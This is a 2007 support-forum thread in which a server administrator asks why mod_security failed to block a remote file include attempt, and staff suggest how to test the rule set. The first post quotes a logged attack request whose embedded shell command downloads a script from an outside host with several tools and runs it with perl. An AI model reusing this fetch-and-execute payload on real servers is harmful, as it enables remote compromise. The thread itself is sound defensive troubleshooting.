Atomic Secure Linux
All times are UTC - 5 hours [ DST ]
Post subject: Mod Security did not stop remote page include
Posted: Tue Oct 30, 2007 10:45 am
Forum Regular
Joined: Mon Oct 29, 2007 6:51 pm
Posts: 606
Seems like Mod Security (in ASL) doesn't stop remote file includes.

Now, I know that this attack was not successful, as the PHP options the script uses are disabled, as well as wget, GET, lwp-* and all that jazz, so he was unable to download the script anyway.

But isn't Mod Sec supposed to catch these?

[Mon Oct 29 14:32:14 2007] [error] [client 201.8.172.106] PHP Fatal error: require() [<a href='function.require'>function.require</a>]: Failed opening required 'http://www.chamala.kit.net/tool25.txt?&cmd=cd%20/tmp;rm%20bn.txt;wget%20http://garyz.110mb.com/bn.txt;fetch%20http://garyz.110mb.com/bn.txt;lwp-download%20http://garyz.110mb.com/bn.txt;curl%20-O%20http://garyz.110mb.com/bn.txt;lynx%20http://garyz.110mb.com/bn.txt;perl%20bn.txt' (include_path='.::.')

Posted: Tue Oct 30, 2007 11:16 am
Forum Regular
Joined: Mon Oct 29, 2007 6:51 pm
Posts: 606
lol, I tried to post the full web log and the server "shunned" me.

In any event, the request returned a status of 200 (success) and was not stopped by mod_sec.

Posted: Fri Nov 02, 2007 8:43 pm
Long Time Forum Regular
Joined: Thu Dec 09, 2004 11:19 am
Posts: 1846
There are ways of getting under the mod_sec radar. That may be the case for this particular issue.

Normally, if you were to put http://anything as an argument in a URL on your server, mod_security would block it. If it isn't doing so, then you need to check that mod_security is actually running.

e.g. http://www.domain-on-your-server/index.php

and right after that last php you add ?blah=

and then after that http://

and then after that blah.com

(sorry - don't want Scott's mod_sec blocking me)

You should get mod_sec triggering.

It's the first thing I do when upgrading/changing.

Also try some of the other rules, like the blogspot one in blacklists.conf.


Faris.
Posted: Fri Nov 02, 2007 9:54 pm
Forum Regular
Joined: Mon Oct 29, 2007 6:51 pm
Posts: 606
Thanks, but yes - mod_sec has been running the entire time. I know that for a fact, as I get the alerts from OSSEC from the audit logs.

Posted: Mon Nov 05, 2007 10:10 am
Atomicorp Staff - Site Admin
Posts: 7428
Location: earth
There are a couple of new rule classes in the -4 mod_sec release in atomic-testing that get a lot deeper into that type of input validation. The best way to get these tracked is to send them to support@atomicorp.com, so we can get a case started on it. Plus, as you've noticed, this server has a super strict modsec policy (it's actually where we do all the new rule testing), and emailing it to support won't shun you like posting to the forums will.